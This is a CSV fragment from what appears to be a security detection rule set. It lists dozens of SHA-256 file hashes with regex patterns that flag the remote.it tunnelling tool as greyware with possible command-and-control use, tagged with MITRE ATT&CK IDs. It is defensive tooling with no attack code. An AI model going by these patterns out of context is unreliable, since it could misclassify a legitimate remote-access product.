"*3a3788e15d2cde3cc0b07bcae1b38a52f756e004cc7426bb45d275d28b7989da*",".{0,1000}3a3788e15d2cde3cc0b07bcae1b38a52f756e004cc7426bb45d275d28b7989da.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*3a828c63459e09fa4b7fd6020d9e35df05d7e03ad9214f6a321f6788089c6a1f*",".{0,1000}3a828c63459e09fa4b7fd6020d9e35df05d7e03ad9214f6a321f6788089c6a1f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*3c10eb3a8cb98f387491c7e8e28c1e7a0e885c74139c9df60043a9ad6d9593fe*",".{0,1000}3c10eb3a8cb98f387491c7e8e28c1e7a0e885c74139c9df60043a9ad6d9593fe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*3dcf212a13eccca01b047a9becb99480bfbb9d0ad9b095407ca9b3546c429274*",".{0,1000}3dcf212a13eccca01b047a9becb99480bfbb9d0ad9b095407ca9b3546c429274.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*3e3a7b98aa6f420061710d64c9bda2aac9040304d2952f46661696d16aed402f*",".{0,1000}3e3a7b98aa6f420061710d64c9bda2aac9040304d2952f46661696d16aed402f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*3ea27a3727d42fba0e3862628a13fe6458bae277d5f477d1fce626e90e12e569*",".{0,1000}3ea27a3727d42fba0e3862628a13fe6458bae277d5f477d1fce626e90e12e569.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*3f34a1d2be46289a7f93e67e605d1d3b45001e2d14d78407da986f3d6d0a7075*",".{0,1000}3f34a1d2be46289a7f93e67e605d1d3b45001e2d14d78407da986f3d6d0a7075.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*400e477ebf627aa5ba9c11ef2cf9cb2bd4acc53a6beca20148f141f6f3c504da*",".{0,1000}400e477ebf627aa5ba9c11ef2cf9cb2bd4acc53a6beca20148f141f6f3c504da.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*41b357d80dd91685737274a7c03aaabf90d9d67245f84fd1af5eff5dc56fa330*",".{0,1000}41b357d80dd91685737274a7c03aaabf90d9d67245f84fd1af5eff5dc56fa330.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*41d31ce4d0e4133c1121a02d2d7121bff87c1a8ebc560181517bc72bde3e8fe5*",".{0,1000}41d31ce4d0e4133c1121a02d2d7121bff87c1a8ebc560181517bc72bde3e8fe5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*4371963ea620ef5dd65176c19997b8067d5d7f72dd722a63f982b5de6659d45c*",".{0,1000}4371963ea620ef5dd65176c19997b8067d5d7f72dd722a63f982b5de6659d45c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*43fc6c375a8f2e40c144d4b47c6d807dcb9aa4dc58fff62761beab1b13c62015*",".{0,1000}43fc6c375a8f2e40c144d4b47c6d807dcb9aa4dc58fff62761beab1b13c62015.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*44a2461a051dde2487b73014e314cd29b2a8f5587d88b99d13a495c5071923b8*",".{0,1000}44a2461a051dde2487b73014e314cd29b2a8f5587d88b99d13a495c5071923b8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*453388653c7d68a5478c82f71496229ec9f9fbafbff2ffc4a3817f392d23fcdd*",".{0,1000}453388653c7d68a5478c82f71496229ec9f9fbafbff2ffc4a3817f392d23fcdd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*4570d2de6fa24427fe99f395693a798d918c58a67fe5be87317e58548605f27d*",".{0,1000}4570d2de6fa24427fe99f395693a798d918c58a67fe5be87317e58548605f27d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*4988a9006fef04ca8ccba9ea08e63a8e960863a4106179c65d445cd71c3ea48a*",".{0,1000}4988a9006fef04ca8ccba9ea08e63a8e960863a4106179c65d445cd71c3ea48a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*4bd934b1beb4ce52cad55ccdbb7528fe449e372125352f2ca4b6ce4cc7f489d6*",".{0,1000}4bd934b1beb4ce52cad55ccdbb7528fe449e372125352f2ca4b6ce4cc7f489d6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*4c67141acad76f0a686c78d5723be5d395b51ac6f323e2ca8788f4678c9df1aa*",".{0,1000}4c67141acad76f0a686c78d5723be5d395b51ac6f323e2ca8788f4678c9df1aa.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*4ceb965f166bdf4d8d16d081d24ad0488cbd67c955d9817b0832a0b70e38db3f*",".{0,1000}4ceb965f166bdf4d8d16d081d24ad0488cbd67c955d9817b0832a0b70e38db3f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*4dbcad57d73bd7245c37f330719add5e842b4c8dd7830039ce50ca2d615ffe16*",".{0,1000}4dbcad57d73bd7245c37f330719add5e842b4c8dd7830039ce50ca2d615ffe16.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*4e278396d6ca4d2eb560f7cac6c7aebc0d729ffa3af3423668b5f30275aa2b51*",".{0,1000}4e278396d6ca4d2eb560f7cac6c7aebc0d729ffa3af3423668b5f30275aa2b51.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*4e2acdb55e74ee0525f6614436674560388b36b8316552fdae32b44398e56ef2*",".{0,1000}4e2acdb55e74ee0525f6614436674560388b36b8316552fdae32b44398e56ef2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*4f29beec80237718a80f87d4afc2a8d79dd8e5b680b2490653a3cacc9856be83*",".{0,1000}4f29beec80237718a80f87d4afc2a8d79dd8e5b680b2490653a3cacc9856be83.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*508e9b2199a8c36668fe48520c2d2ba6ee30db5fca04c7ca3e7cd42e5ce20097*",".{0,1000}508e9b2199a8c36668fe48520c2d2ba6ee30db5fca04c7ca3e7cd42e5ce20097.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*50dae26eefa5516f7a4a02832fa065d971ca9feebbee519f2a2ab1bcb3dedd12*",".{0,1000}50dae26eefa5516f7a4a02832fa065d971ca9feebbee519f2a2ab1bcb3dedd12.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*5170878a45097dd423d7ab4ec48724b4ef046ea5d990e763d18eee67af881e74*",".{0,1000}5170878a45097dd423d7ab4ec48724b4ef046ea5d990e763d18eee67af881e74.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*53ea72dc5887ad00512cccb7991fd7e7a3116390d87ddb45af322f50fee469a7*",".{0,1000}53ea72dc5887ad00512cccb7991fd7e7a3116390d87ddb45af322f50fee469a7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*5469da4765d2a07fa3cb198ee9d2332862a9b270af4960e22d149cafd8f97c3f*",".{0,1000}5469da4765d2a07fa3cb198ee9d2332862a9b270af4960e22d149cafd8f97c3f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*54ba4f0b5b5211e027f2e97eca9b534a7e937b23e50f8db93ed573b2a3db9670*",".{0,1000}54ba4f0b5b5211e027f2e97eca9b534a7e937b23e50f8db93ed573b2a3db9670.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*565bb9fd10eabae3f557cd29ee48b29054f98aa3934c2c3c2a6e6e528d06b5fb*",".{0,1000}565bb9fd10eabae3f557cd29ee48b29054f98aa3934c2c3c2a6e6e528d06b5fb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*56c68e08402096d11585592005d9eae985cf0d248e2f8103da15ad351eafae58*",".{0,1000}56c68e08402096d11585592005d9eae985cf0d248e2f8103da15ad351eafae58.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*56ca2194c2c1dae9900e4d9e5def115af7c7f6376fffeaaef08e00ed95b81934*",".{0,1000}56ca2194c2c1dae9900e4d9e5def115af7c7f6376fffeaaef08e00ed95b81934.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*56ccaa3297c8004543544b5d56c801a9c7ac1e40bc8b9e7258634ef4dc95a44b*",".{0,1000}56ccaa3297c8004543544b5d56c801a9c7ac1e40bc8b9e7258634ef4dc95a44b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*575fa9f32f88855c0e945bc076061933bbd0991f640b12da69e3a209b307decb*",".{0,1000}575fa9f32f88855c0e945bc076061933bbd0991f640b12da69e3a209b307decb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*57d460230411f7d23ab6cd3463c737c657c0225df3a1aac75e049ca9d66f5763*",".{0,1000}57d460230411f7d23ab6cd3463c737c657c0225df3a1aac75e049ca9d66f5763.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*59b97a0dd632d3cb6741d58d315bab9e1407bacd3c5129554cc3a61770ece321*",".{0,1000}59b97a0dd632d3cb6741d58d315bab9e1407bacd3c5129554cc3a61770ece321.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*5a57e519ca408107e53cc361cc237e3e57929721bc3eabebc5ab5b1275adca6d*",".{0,1000}5a57e519ca408107e53cc361cc237e3e57929721bc3eabebc5ab5b1275adca6d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*5aa6d23a262a238dbddddf45fa06d182673142a416002dc70e4c893f9aee723f*",".{0,1000}5aa6d23a262a238dbddddf45fa06d182673142a416002dc70e4c893f9aee723f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*5c0c101aa1f0e6a4ed5a67831b13a88ed9c678aaa8c2860dcdc191a8a073c153*",".{0,1000}5c0c101aa1f0e6a4ed5a67831b13a88ed9c678aaa8c2860dcdc191a8a073c153.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*5d1cf73d662aa8ef604855576ba9fa9cec217c18b4afa0794ab659b386112030*",".{0,1000}5d1cf73d662aa8ef604855576ba9fa9cec217c18b4afa0794ab659b386112030.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*5e793d7d56ba10e446a23ee4523ade87336e1eff95cdded4312800bf3997e548*",".{0,1000}5e793d7d56ba10e446a23ee4523ade87336e1eff95cdded4312800bf3997e548.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*5e99f3186a99ec653ec3dcc9d6b4e3b1cfd5993ee0a33692bdf571e3e54309a2*",".{0,1000}5e99f3186a99ec653ec3dcc9d6b4e3b1cfd5993ee0a33692bdf571e3e54309a2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*5f9ea43593ac996fc08651431bfbce6408c6dabd0ea01881c56ef6d083e8b0bc*",".{0,1000}5f9ea43593ac996fc08651431bfbce6408c6dabd0ea01881c56ef6d083e8b0bc.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*5fd16aba9217f23c9bf91eb92f870f9b368f2a0da3b2799a88ac63454f2a0559*",".{0,1000}5fd16aba9217f23c9bf91eb92f870f9b368f2a0da3b2799a88ac63454f2a0559.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*662aa3c30a3486158b79373f1ab537139a069778519e8e42455e846ff4bab1f8*",".{0,1000}662aa3c30a3486158b79373f1ab537139a069778519e8e42455e846ff4bab1f8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*693475b69741d88b18afca69ab81daa69d5b7fe8f5f6849f69676b62c3379af5*",".{0,1000}693475b69741d88b18afca69ab81daa69d5b7fe8f5f6849f69676b62c3379af5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*6a43c893da2a0f2fa6dcbec833f34290385c9ec44f06a358fadaad4677c9ae76*",".{0,1000}6a43c893da2a0f2fa6dcbec833f34290385c9ec44f06a358fadaad4677c9ae76.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*6d2e71d3158ce74d7cd53b333edc7389b02c9d473658b87d898a7a40e377850c*",".{0,1000}6d2e71d3158ce74d7cd53b333edc7389b02c9d473658b87d898a7a40e377850c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*6db1c295c1602011ddba8c5d3e43d8c73f247d1367fa2600062862004b1e88db*",".{0,1000}6db1c295c1602011ddba8c5d3e43d8c73f247d1367fa2600062862004b1e88db.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*6e469301d72958686bc78469c7c9d6a79fb848e77e6b00a037526d44f5d48819*",".{0,1000}6e469301d72958686bc78469c7c9d6a79fb848e77e6b00a037526d44f5d48819.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z"
"*6e8947870ecf553ed99f745eb8c66fd7daf3d60fb16f5ff44285c7c7f11137c0*",".{0,1000}6e8947870ecf553ed99f745eb8c66fd7daf3d60fb16f5ff44285c7c7f11137c0.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*6ef99a03b1df823546e414b4b3ce5ce0e43121db66b52c9e10b61ab653b46bf8*",".{0,1000}6ef99a03b1df823546e414b4b3ce5ce0e43121db66b52c9e10b61ab653b46bf8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*6fa10205d1ade554f1f0250db2752f855919abba4cf63efb907a7543efc1beae*",".{0,1000}6fa10205d1ade554f1f0250db2752f855919abba4cf63efb907a7543efc1beae.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*6ff59cb7898fc8534f0a799029d8cf5b9b033c1d19cba81a91b6cb05415d34c1*",".{0,1000}6ff59cb7898fc8534f0a799029d8cf5b9b033c1d19cba81a91b6cb05415d34c1.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*778dc2b522e8c8a828ac6de8c286f136bfff01ab570d90edc107ca21d68bfde2*",".{0,1000}778dc2b522e8c8a828ac6de8c286f136bfff01ab570d90edc107ca21d68bfde2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*79571f764640046994297e5c3123fc3c5243d5df378a16abbce7abc30ebec829*",".{0,1000}79571f764640046994297e5c3123fc3c5243d5df378a16abbce7abc30ebec829.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*796c8853196cd8a5b4aaed85718ff95c86006200fa5f579a9523f66421873004*",".{0,1000}796c8853196cd8a5b4aaed85718ff95c86006200fa5f579a9523f66421873004.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*796d3702d3376d0116192eef85fbb05e2f10531c57958489bbadb92372c120e6*",".{0,1000}796d3702d3376d0116192eef85fbb05e2f10531c57958489bbadb92372c120e6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*7983d5af3fb00770345c09aca16a8d8ff122dbe81b58a0de69b571b55f4dae1e*",".{0,1000}7983d5af3fb00770345c09aca16a8d8ff122dbe81b58a0de69b571b55f4dae1e.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*79f5c26bdac4bbebe20fad039b028776f064003690b4141e9db5fd01c3262901*",".{0,1000}79f5c26bdac4bbebe20fad039b028776f064003690b4141e9db5fd01c3262901.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*7b430460f7b6eee413a53e58f7ca7ff5c5f66c9e31fce4b2f02c9fe76f251301*",".{0,1000}7b430460f7b6eee413a53e58f7ca7ff5c5f66c9e31fce4b2f02c9fe76f251301.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*7c4914fb0be3e091e4c693c4c6c31824b75b270a97ead524a4795b6d32b6b6ce*",".{0,1000}7c4914fb0be3e091e4c693c4c6c31824b75b270a97ead524a4795b6d32b6b6ce.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*7c8a8e35b0104fe2fef94a7c7cff468bf7447b77b1018fc1d692da9d001fe3e4*",".{0,1000}7c8a8e35b0104fe2fef94a7c7cff468bf7447b77b1018fc1d692da9d001fe3e4.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*7df5411490635c5c29704e2fec13133a27a4acaa35255cd22da16dda1b9f5f24*",".{0,1000}7df5411490635c5c29704e2fec13133a27a4acaa35255cd22da16dda1b9f5f24.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
